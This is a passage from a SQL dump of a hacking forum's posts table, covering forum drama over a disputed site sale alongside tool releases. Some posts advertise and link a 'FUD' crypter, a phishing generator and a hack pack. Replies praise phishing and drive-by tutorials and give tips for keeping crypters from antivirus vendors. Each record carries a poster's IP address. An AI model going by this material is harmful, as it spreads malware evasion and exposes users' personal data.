claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.\r\n\r\n[b]Update:[/b]\r\n[quote=\'t3h jok3r\']\r\nYour staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn.\r\n[/quote]', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'f61bab83fa250cc23cc7c33352bfb07f', '0', '0'); INSERT INTO mybb_posts VALUES('3873', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '232', 'BreShiE', '1349659140', 'I\'ve added you both, I\'d like in please! :)', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '64b3f2283cc58482a6c097bcb7b81069', '0', '0'); INSERT INTO mybb_posts VALUES('3874', '760', '3872', '19', 'RE: The Site Owner', '0', '243', 'Anarchy $ucks', '1349659251', 'Fucken scammer, I go on this site all I see is scam? Any thoughts admin?', '97.254.8.21', '1644038165', '0', '0', '0', '0', '1', '360ca082735ef7544b4a03e7db65e037', '0', '0'); INSERT INTO mybb_posts VALUES('3875', '760', '3874', '19', 'RE: The Site Owner', '0', '243', 'Anarchy $ucks', '1349659469', '[quote=\'Aphstire\' pid=\'3874\' dateline=\'1349659251\']\r\nFucken scammer, I go on this site all I see is scam? Any thoughts admin?\r\n[/quote]\r\n\r\nHe\'ll delete the thread when he sees it. :P', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'b335f1eafe015df9327b0eca38ae3783', '0', '0'); INSERT INTO mybb_posts VALUES('3876', '760', '3872', '19', 'RE: The Site Owner', '0', '222', 'Exposé', '1349659536', 'Honestly I think that all of this bullshit could have been avoided if the 2 forums just stayed on their different paths. Honestly AF is shit....and I hope LH can do good :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '88fd7a17bece6733c0c287513a6f7deb', '0', '0'); INSERT INTO mybb_posts VALUES('3888', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '61', 'NXK', '1349661907', 'Welcome to L33t hacking! We\'ve already met And I like you. Helpful already!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0998b8756263f35f51abbd41ff26e557', '0', '0'); INSERT INTO mybb_posts VALUES('3878', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '222', 'Exposé', '1349659588', 'Sup breshie....welcome to LH...lol even though Iv\'e already talked to you :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '8767a823e6ee8273be1e256f8d7ca10f', '0', '0'); INSERT INTO mybb_posts VALUES('3879', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349659685', 'Dude your like fuckin 12 years old. Anarchyforums is complete garbage....', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'ff217e5c7458f3c5f4aa69554fa8880f', '0', '0'); INSERT INTO mybb_posts VALUES('3887', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '1', 't3h jok3r', '1349661853', 'Welcome to L33THacking and hope you like L33THacking.\n\nHope you stay active and enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '25f726ab737d7dbc31417c83bba9febf', '0', '0'); INSERT INTO mybb_posts VALUES('3881', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349659827', 'Haha from HF? I have like 20 posts bro....and I will see to it that this site get\'s hosting which your little ping attack can\'t take down', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'a4bd4b2b34980d704c10a149437a2f81', '0', '0'); INSERT INTO mybb_posts VALUES('3882', '761', '0', '52', 'wTools | Host To IP | Geo-IP | CloudFlare Resolver | AIO Skype Tools', '0', '232', 'BreShiE', '1349661078', 'Welcome to the official thread of wTools. wTools is a next-gen application for multiple tools all built into one free program. Below you can find a list and screenshots of all the current features in the program. There\'s been a lot of work put into this, so I hope you guys enjoy it, and please leave me a comment if you try it out! Thanks to AeonHack for use of his themes. The program is not obfuscated, as this is open source software!\n\n[size=medium]Name:[/size]\nwTools\n\n[size=medium]Features:[/size]\n[list]\n[*] Easy-To-Use GUI\n[*] IP Pinger\n[*] IP Tracer\n[*] CloudFlare Resolver\n[*] Email Spoofer - Need to fix\n[*] Skype Tools\n[list]\n[*] Mass Messenger\n[*] Mass Messenger Spammer\n[*] Spammer\n[*] Annoying Spammer\n[*]Skype Resolver\n[/list]\n[*]PortableTweets - Previously a separate project of mine\n[*]Icon Changer\n[/list]\n\n\n[size=medium]Download Link:[/size]\nhttp://www.mediafire.com/?6wl4a8ykn4v4t3v\n\n[size=medium]Virus Scan:[/size]\nhttps://www.virustotal.com/file/8e549cba18ca4bc66e81748708e09ebbda58064633d285252a209c7512882076/analysis/1349744282/\nhttp://vscan.novirusthanks.org/analysis/a3a037e7fba67a10e65ea8866270aa35/d3Rvb2xzLWV4ZQ==/\n(false positives - I used iexpress for the .DLL files, an icon changer after than and file changer after that)\n\n\n[size=medium]Screenshots:[/size]\n[spoiler]\n[img]http://i.imgur.com/Mkpns.png[/img]\n\n[img]http://i.imgur.com/fMw36.png[/img]\n\n[img]http://i.imgur.com/Ph3Ft.png[/img]\n\n[img]http://i.imgur.com/8fC5j.png[/img]\n[/spoiler]\n[hr]\nReleased the next update of wTools!\n\nChangelog:\n[list]\n[*]Added Skype Resolver\n[*]Added PortableTweets\n[*]Added Icon Changer\n[*]Added auto-updater for future updates\n[/list]', '78.149.61.34', '1318403362', '0', '0', '232', '1349745094', '1', '1f5a5177dc542c4d0ddc1078ce3fa671', '0', '1349744880'); INSERT INTO mybb_posts VALUES('3883', '684', '3498', '19', '[Junk]Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '1', 't3h jok3r', '1349661206', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3884', '758', '3869', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349661285', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3885', '760', '3872', '19', '[Junk]The Site Owner', '0', '1', 't3h jok3r', '1349661285', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3886', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349661450', 'Yeah, on [i]that one shit forum[/i]. Lol, I\'m so glad I\'m here now instead of there.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', 'd5048f831e42fdc312dcbd7ef8238204', '0', '0'); INSERT INTO mybb_posts VALUES('3889', '762', '0', '58', 'LH Coders: Official Group - Applications: OPEN', '0', '232', 'BreShiE', '1349666395', '[color=#00BFFF][size=small]Welcome to the LH Coders recruitment thread. If you have any questions, don\'t hesitate to leave a comment![/size][/color]\r\n\r\n[size=large][b]Group Leaders:[/b][/size]\r\n[list]\r\n[*][url=http://l33thacking.net/user-232.html]BreShiE[/url]\r\n[/list]\r\n\r\n[size=large][b]Requirements:[/b][/size]\r\n[size=x-small][color=#00BFFF]Please take note that some of these are the default requirements and some are made by the leaders of LHC.[/color][/size]\r\n[list]\r\n[*]At least 15 posts\r\n[*]Ability To Code (will need proof)\r\n[*]Must Be Friendly\r\n[*]Understandable level of grammar\r\n[*]Ability to help members with patience\r\n[/list]\r\n\r\n\r\n[size=large][b]Group Image:[/b][/size]\r\n[img]http://l33thacking.net/images/ub/Coders.png[/img]\r\n\r\n\r\n[size=large][b]The Form:[/b][/size]\r\n[code]\r\n[color=#32CD32][b]What Can You Code:[/b][/color]\r\nAnswer Here\r\n\r\n[b][color=#32CD32]Favorite Coding Language:[/color][/b]\r\nAnswer Here\r\n\r\n[color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color]\r\nAnswer Here\r\n\r\n[color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color]\r\nAnswer Here\r\n\r\n[b][color=#32CD32]Age:[/color][/b]\r\nAnswer Here\r\n\r\n[b][color=#32CD32]Proof Of Your Coding Abilities:[/color][/b]\r\nAnswer(s) Here\r\n[/code]\r\n\r\n\r\n[size=large][b]Our Goal:[/b][/size]\r\n\r\nThe goal of LHC (LH Coders) is to create a unique group of coders who are willing to support and bring amazing content to this forum.\r\n\r\n\r\n[size=large][b]Extras:[/b][/size]\r\n\r\nOnce accepted into the group, for any program you release on this forum, you have to use the official banner. (see subforum).\r\n\r\nPlease do NOT at ANY time apply via the User CP, all applications here are monitored, and if you\'re accepted, you shall be contacted via PM and added in.\r\n\r\n\r\n[color=#FF0000][size=large][b]Disclaimer:[/b][/size][/color]\r\n\r\nWe withhold the right to deny an application without any reason at all, although you will be notified whether you\'re rejected or accepted.\r\n\r\nWe may also remove you at any time without reason, although this should never happen.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '2a6cf721e9dc5b92a1cd98bc34929232', '0', '0'); INSERT INTO mybb_posts VALUES('3890', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '222', 'Exposé', '1349667218', '[color=#32CD32][b]What Can You Code:[/b][/color]\nWell I can code in vb.net(pro), java (noob), html(average), php(nubish), and css. I am currently working on learning C++ as it is a high level language and it will really help me further my career and get a good job.\n\n[b][color=#32CD32]Favorite Coding Language:[/color][/b]\nObviously my language of choice is vb.net as I have studied it for 3 yrs and have created many programs throughout my time. I mostly create web/client software applications that give users the ability to remotely access information and files online. In my early years I developed bots or auto-taskers which did any task that I wanted it to do. Then I started to get into more advanced software development like an rdp application like teamviewer and chat applications etc. Most of the time I freelance for other people if they want applications built.\n\n[color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color]\nOf course I will give support to my fellow coders. Why else would I be in this group.?\n\n[color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color]\nI am on like 24/7 and can be on LH like 23/7 of the day haha.', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '817855b368d7dc9c0e565ece7d5ffb27', '0', '0'); INSERT INTO mybb_posts VALUES('3891', '763', '0', '58', '[Announcement]Group Changes', '0', '61', 'NXK', '1349667886', 'There has been some changes in groups today.\n\n[url=http://l33thacking.net/user-232.html]BreShie[/url] is the new leader of the [b]Coders[/b] group.\n\nWe added a new group called [b]Fearless[/b] which is ran by [url=http://l33thacking.net/user-222.html]flamingworm[/url].\n\n[b]Unique[/b] group also has a new leader, the new leader is [url=http://l33thacking.net/user-62.html]R?????zo? [/url]', '72.231.24.165', '1223104677', '1', '0', '1', '1349727478', '1', '14b67158e318f0dfa1e8b431bb9f8e26', '0', '1349727478'); INSERT INTO mybb_posts VALUES('3892', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349668170', 'Sure, it would be a good idea.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '73a308ebcbbe35fab580e046e0c3ac4f', '0', '0'); INSERT INTO mybb_posts VALUES('3893', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '232', 'BreShiE', '1349668674', 'I\'ve PM\'d you flamingworm. Awaiting the submission.', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', 'fd35f698973e97d7cdf49475367965ac', '0', '0'); INSERT INTO mybb_posts VALUES('3894', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '232', 'BreShiE', '1349668954', 'I think it\'ll be better if the font was the same as the one in your signature.', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', 'ab102de9f4e270ca04572ff90704271c', '0', '0'); INSERT INTO mybb_posts VALUES('3895', '764', '0', '15', 'Hack Pack By Timmy | 2GB |', '0', '5', 'Timmy', '1349671302', 'Hello and Welcome LH.\n\nToday, ive got another pack for you guys here!\n\nI am currently uploading a 2GB hackpack wich ive been adding stuff to since i started with my little hacking life so to say, haha.\n\nSo, here\'s the download link for you all, please be patient since its over 2GB!\n\nAnyways, please check through it, it concludes the most of stuffs, some need to be used in a specific way and etc, but please just PM me or search it up on google or other forums.\n\n[lock]https://dl.dropbox.com/u/64014494/HF-Forums.rar[/lock]\n\nA picture from the pack:\n[img]http://i.imgur.com/I38Ro.png[/img]', '72.231.24.165', '1223104677', '1', '0', '1', '1352011287', '1', '1c8e958be0a71c351bf3080cb00ff224', '0', '1352011287'); INSERT INTO mybb_posts VALUES('3896', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '5', 'Timmy', '1349671371', 'I was like WTF for a moment because when Jok3r said was never sold I thought someone cheated Jok3r and sold L33THacking.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77bd7a401a5dcc12503174230a2cc0a6', '0', '0'); INSERT INTO mybb_posts VALUES('3897', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '5', 'Timmy', '1349671401', 'Welcome to L33THacking. I hate that [i]shit[/i] forum too.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a410d7a8b55be7826e72c67d77f067c3', '0', '0'); INSERT INTO mybb_posts VALUES('3898', '737', '3746', '7', 'RE: Just voted', '0', '5', 'Timmy', '1349671475', 'Where did you vote and for what did you vote?\n\nI agree LH is the best forum plus it discourages Skid programs also has more blackhat stuff. I actually love the Movie RIPs and deep web stuff on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9059554743ec98a6683949b8bd560e86', '0', '0'); INSERT INTO mybb_posts VALUES('3899', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '5', 'Timmy', '1349671507', 'Sucks bro hope you get Google to unban us.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fb00ff0cbb726a55e5efa30da36fe649', '0', '0'); INSERT INTO mybb_posts VALUES('3900', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '5', 'Timmy', '1349671588', 'Thanks it\'s a nice tutorial, very awesome signatuer.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f2d3ae98a541f38c5f4e3c67aeb4f611', '0', '0'); INSERT INTO mybb_posts VALUES('3901', '765', '0', '46', 'Vulcan Private Pisher Generator', '0', '7', 'Romdu62', '1349671864', '[align=center]\r\n\r\n[img]http://gyazo.com/1b3507de6b1b9967501ffd72d323c4e1.png?1348626039[/img]\r\n\r\n[url=http://elementscanner.net//?RE=e7411761ed24b382a447497c6f0d450e][img]http://elementscanner.net//image.php?ID=e7411761ed24b382a447497c6f0d450e[/img][/url]\r\n\r\n[url=http://www.mediafire.com/download.php?31lxh7q4hphfwp8][img]http://img254.imageshack.us/img254/9947/downloadnow.png[/img][/url][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7fc0abfe65e3f1b5df581c1d6ffaad9a', '0', '0'); INSERT INTO mybb_posts VALUES('3902', '766', '0', '20', '[3/14] War - Crypter [ScanTime] by cris', '0', '7', 'Romdu62', '1349672344', 'Hello,\n\nThis crypter is FUD (3/14)\n\n[url=http://adf.ly/D1Y7q]Here is the scan of my virus..[/url]\n\nBefore encryptions the name of your virus also has to be builded.exe....\n\n[align=center][img]http://img15.hostingpics.net/pics/166786Capture.png[/img][/align]\n\n[align=center][url=http://adf.ly/D1Z1S]Stub Scan[/url]\n[url=http://adf.ly/D1Yen]War - Crypter Scan[/url][/align]\n\n[align=center][img]http://img15.hostingpics.net/pics/551328Capture2.png[/img][/align]\n\nAfter the encoding you will can changed the name .....\n\n[align=center][b][url=http://adf.ly/D1Zqb]Download Link[/url][/b][/align]', '72.231.24.165', '1223104677', '0', '0', '7', '1349672385', '1', '3776c1db032259dc63c15e5dbeb9bb36', '0', '1349672385'); INSERT INTO mybb_posts VALUES('3903', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '7', 'Romdu62', '1349672458', 'Very hard but good for pros and this is the best technique to hack facebook accounts.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '31eeff3716fe1f138adb278ddab77957', '0', '0'); INSERT INTO mybb_posts VALUES('3904', '750', '3828', '3', 'RE: Leaving', '0', '222', 'Exposé', '1349674382', 'Lol switching over to AF lulz...good luck with that...', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '78368d9ceef5f47c38b8912a1865c3ba', '0', '0'); INSERT INTO mybb_posts VALUES('3905', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '222', 'Exposé', '1349674419', 'As I said before I am willing to donate for a better server or whatever. :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '1bfbd631fe8ff4b9b0c05a0f913cfce0', '0', '0'); INSERT INTO mybb_posts VALUES('3906', '750', '3828', '3', 'RE: Leaving', '0', '62', 'R?????zo?', '1349685044', 'Sad to see you leaving really, good luck bro', '188.37.112.250', '-1138396934', '1', '0', '0', '0', '1', '26a0127d6cfa051cec0251ff075107ea', '0', '0'); INSERT INTO mybb_posts VALUES('3907', '695', '3547', '16', 'RE: If you need help...i\'m here!', '0', '62', 'R?????zo?', '1349686910', '[quote=\'t3h jok3r\' pid=\'3547\' dateline=\'1349495175\']\r\nWe actually have a user that needs something SE\'d. He might be willing to pay as well. \r\n\r\n\r\nHelp Thread: http://l33thacking.net/thread-637.html\r\n[/quote]\r\n\r\nyeah, I still need this actually. \r\nwould be awesome if you could help :)', '205.164.4.4', '-844889084', '1', '0', '0', '0', '1', 'bdbc1784412bd03a9347c85118f31879', '0', '0'); INSERT INTO mybb_posts VALUES('3908', '750', '3828', '3', 'RE: Leaving', '0', '205', 'mothered', '1349693290', 'You\'re quite a pleasant member, so It\'s not good news that you\'re leaving.\r\n\r\nUltimately, It\'s your choice, so all the best with whatever you decide.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '24e4890f1d7ddfea22cf12f11c9c5144', '0', '0'); INSERT INTO mybb_posts VALUES('3909', '737', '3749', '7', 'RE: Just voted', '0', '205', 'mothered', '1349693996', '[quote=\'sirchamp\' pid=\'3749\' dateline=\'1349612943\']\r\nHf isnt garbage. Its full of trolls tough\r\n[/quote]\r\n\r\nHF Is just plain trash In It\'s entirety. Enough said.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'aa8a756ac9585c58c42a9dfd66225ebc', '0', '0'); INSERT INTO mybb_posts VALUES('3910', '743', '3792', '23', 'RE: I got a virus', '0', '205', 'mothered', '1349694238', 'Forget about the futility of scans etc.\r\n\r\nHit a clean Installation of Windows, by deleting all existing partitions, and Install on the Unallocated disc space. Install the latest drivers via the Manufacturer\'s website thereafter.\r\n\r\nAt least you can be rest assured, that upon first booting Into the Windows environment after formatting, your system will be free from all malicious content.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9cfa9dc2187bc2765a2e78edf1cfa4ec', '0', '0'); INSERT INTO mybb_posts VALUES('3911', '745', '3798', '59', 'RE: [Leak] Huge Folder of Ebooks', '0', '205', 'mothered', '1349694506', 'Nice, very nice Indeed.\r\n\r\nI shall hit the download.\r\nMuch appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '04e59b2df84966fbcb223ef70c92fce6', '0', '0'); INSERT INTO mybb_posts VALUES('3912', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '53', 'sirchamp', '1349699559', 'Welcome. I have a few tools which were made by you. is this your site: breshie.com ?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '703b0c97b18f34ba5e858043890a006c', '0', '0'); INSERT INTO mybb_posts VALUES('3913', '767', '0', '74', 'Do you cheat/hack games?', '0', '53', 'sirchamp', '1349702535', 'I hack mostly in games. And you?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c6ce475c584b54759c99bbead850aff6', '0', '0'); INSERT INTO mybb_posts VALUES('3914', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '225', 'Graycat', '1349702699', 'Thanks I will be sure to try this method.', '75.162.63.152', '1268924312', '0', '0', '0', '0', '1', '4175651c7f5b35e1efe7bb3193f88762', '0', '0'); INSERT INTO mybb_posts VALUES('3915', '713', '3640', '12', 'RE: How To Make A FUD Java Drive-By', '0', '225', 'Graycat', '1349702765', 'very cool method im going to try this tonight!', '75.162.63.152', '1268924312', '0', '0', '0', '0', '1', '5d7a044abb491e7fddb8c5adee064e29', '0', '0'); INSERT INTO mybb_posts VALUES('3916', '198', '713', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '225', 'Graycat', '1349702860', 'Thanks ive been looking for this', '75.162.63.152', '1268924312', '0', '0', '0', '0', '1', 'ef645610e898cd7fdaa7d894b685664d', '0', '0'); INSERT INTO mybb_posts VALUES('3917', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349702907', 'http://www.touque.ca/EC/ICS2O/students/2011-02/ICS2O2A/AbdouN/images/4seasons.jpg', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e1153910946829b18654d392cd4ecc7', '0', '0'); INSERT INTO mybb_posts VALUES('3918', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349703108', 'You did. I was talking to Rave though', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25ffe1c1feb9c4f2f177824148d27673', '0', '0'); INSERT INTO mybb_posts VALUES('3919', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349703141', 'Alright. .Well I\'m not Moderator anymore so I won\'t be doing much.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c02cec418b8b96e8346410811653acc8', '0', '0'); INSERT INTO mybb_posts VALUES('3920', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349703185', 'I\'m in it right? Just making sure. ?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd1aac0bff88766fa1571eb09d0306fe0', '0', '0'); INSERT INTO mybb_posts VALUES('3921', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349703216', 'Thanks for the notice. Good luck with Unique someone..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83cdb12081ee337112bb65566635db8e', '0', '0'); INSERT INTO mybb_posts VALUES('3922', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349703309', 'Just because I said the forum was dead in the VIP Section doesn\'t mean I was behind this. I just said lets try to make it active again because the VIP Section was inactive.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3792edecc684fc9fd2b6a7f92bfdebf9', '0', '0'); INSERT INTO mybb_posts VALUES('3923', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1349703455', 'Yeah. You\'re welcome . :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9f13a826c19dbc4c6b7617f40c48ae1a', '0', '0'); INSERT INTO mybb_posts VALUES('3924', '734', '3753', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349703525', '[quote=\'iTzGRONgamer61\' pid=\'3753\' dateline=\'1349614110\']\r\nTraffic bots fuuuuuck :( this is a sad day for LH\r\n[/quote]\r\n\r\n...\r\nI didn\'t use traffic bots so whatever you\'d say to me on Skype, meh I don\'t care.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ee3937315b9d99ed98e49efef13ded5', '0', '0'); INSERT INTO mybb_posts VALUES('3925', '743', '3792', '23', 'RE: I got a virus', '0', '82', 'iTzIpod', '1349703619', 'I think I got rid of it. But I\'ll still discuss it with Anonymous. Thanks iTzGRONGamer61 for messaging him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0add2361e168fe953dd5b226569fb7a8', '0', '0'); INSERT INTO mybb_posts VALUES('3926', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '82', 'iTzIpod', '1349703669', 'I hack in certain PC Games. That\'s pretty much it :p Or maybe other systems/game consoles. Not that I know of.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84d89eaf0d4157f043a432b4c7f0499b', '0', '0'); INSERT INTO mybb_posts VALUES('3927', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '237', 'Azwan81', '1349706134', 'There is no problem if your upload crypter to mediafire,just dont scan on virustotal,coz virus total will send data to any antivirus company for any type of tool your scan on virustotal,', '203.92.138.166', '-883127642', '0', '0', '0', '0', '1', '0d1c1705c54710825a638288c0d9bc3b', '0', '0'); INSERT INTO mybb_posts VALUES('3928', '734', '3924', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349706769', '[quote=\'iTzIpod\' pid=\'3924\' dateline=\'1349703525\']\r\n[quote=\'iTzGRONgamer61\' pid=\'3753\' dateline=\'1349614110\']\r\nTraffic bots fuuuuuck :( this is a sad day for LH\r\n[/quote]\r\n\r\n...\r\nI didn\'t use traffic bots so whatever you\'d say to me on Skype, meh I don\'t care.\r\n[/quote]\r\nOff-Topic: Yo bro what happened to your staff position? You were very active.\r\nOn-Topic: That has to sucks, hopefully you can get google to unban us so that we can actually get members from google by searching hacking forums or something.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '14f1fe2874a53f34597822f468141051', '0', '0'); INSERT INTO mybb_posts VALUES('3929', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349711548', 'I asked for a demotion. And asked t3h jok3r to remove everything off of me. \nSo he did as I told him too. He stripped me from my position and took away my Userbars.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '76a25a1af010118e1fdbd9969ce61631', '0', '0'); INSERT INTO mybb_posts VALUES('3930', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '62', 'R?????zo?', '1349713357', 'I hack in every game I can that will take me advantage over other players online.\nFor singleplayer I only cheat for fun when im done with the game.', '89.214.177.70', '1507242310', '1', '0', '0', '0', '1', '8eb9211ce88f32685b1b09d60c8afa89', '0', '0'); INSERT INTO mybb_posts VALUES('3931', '768', '0', '19', '[Junk]Site Owner 00', '0', '243', 'I am invisible', '1349714744', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with.\r\nI had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal.\r\n\r\nIn our deal, I was to receive:\r\n[list]\r\n[*]The domain\r\n[*]Their database\r\n[*]A full backup of the site\r\n[*]Any themes used on the site\r\n[/list]\r\n\r\nI haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site.\r\nI apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others.\r\n\r\n[b]Here are screenshots to back my claims:[/b]\r\n[spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler]\r\n\r\nOnce again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is.\r\nAdditionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.\r\n\r\n[b]Update:[/b]\r\n[quote=\'t3h jok3r\']\r\nYour staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn.\r\n[/quote]', '93.182.129.86', '1572241750', '0', '0', '0', '0', '1', 'c0fa9eb99a9b5ad12988463403eb8832', '0', '0'); INSERT INTO mybb_posts VALUES('3932', '392', '1816', '9', 'RE: PPD Niches', '0', '228', 'VirtualLegend', '1349717684', 'I think no one is gonna share a PPD niche, because it\'s like giving money away, and besides that you\'re the competition.\n\nBut if someone share\'s a PPD Niche than i will Vouch for him :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '52fb0d9b66952ac96bd11afd0e467371', '0', '0'); INSERT INTO mybb_posts VALUES('3933', '768', '3931', '19', '[Junk]Site Owner 00', '0', '1', 't3h jok3r', '1349719237', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3934', '734', '3929', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349719441', '[quote=\'iTzIpod\' pid=\'3929\' dateline=\'1349711548\']\r\nI asked for a demotion. And asked t3h jok3r to remove everything off of me. \r\nSo he did as I told him too. He stripped me from my position and took away my Userbars.\r\n[/quote]\r\n\r\nI thought you wanted to leave LH. If you want to still be part of LH and just not be mod then I can return the elite and your unique userbar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0662552161a7f1c4cce032ebc36363d7', '0', '0'); INSERT INTO mybb_posts VALUES('3935', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '214', 'Rave™', '1349719529', 'Dammit I was about to release this today', '66.203.52.145', '1120613521', '1', '0', '0', '0', '1', 'edc227ef1329d4dd57791a32da11b318', '0', '0'); INSERT INTO mybb_posts VALUES('3936', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349719574', 'I\'m on a kindle so have to to double post.\n\nThe person that was DDoSing us and spammed the whit out of us yesterday is the owner of Anarchy forums.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '048a2aebd7ba7958143dadd041fdba12', '0', '0'); INSERT INTO mybb_posts VALUES('3937', '747', '3922', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h 